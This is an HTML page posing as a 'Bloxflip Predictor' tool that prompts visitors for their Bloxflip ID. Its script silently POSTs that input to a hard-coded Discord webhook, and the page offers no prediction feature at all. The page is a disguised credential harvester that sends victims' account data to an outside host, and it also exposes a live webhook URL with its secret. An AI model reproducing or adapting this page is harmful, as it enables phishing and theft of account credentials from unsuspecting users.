<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Bloxflip Predictor</title>
    <link rel="stylesheet" href="style.css">
  </head>
  <body>
    <form>
      <input id="webhookName" placeholder="Leave this blank">
      <input id="avatarUrl" placeholder="Leave this blank">
      <input id="yourMessage" placeholder="Enter your Bloxflip ID">
      <input type="submit" onclick="sendMessage()"></input>
    </form>
  </body>

  <script>

    var wname = document.getElementById('webhookName')
    var wavatar = document.getElementById('avatarUrl')
    var ymessage = document.getElementById('yourMessage')


    function sendMessage() {
      var request = new XMLHttpRequest();
      request.open("POST", "https://discord.com/api/webhooks/1032114008397987840/2cD81tiH7JraiD5bhnkN2IUcms19p0sD4q1v_1-NDqBjP_TFlR6Vtmw8-vLfyqN3Y6Rm");

      request.setRequestHeader('Content-type', 'application/json');

      var params = {
        username: wname.value,
        avatar_url: wavatar.value,
        content: ymessage.value
      }


      request.send(JSON.stringify(params));
    }
  </script>
</html>
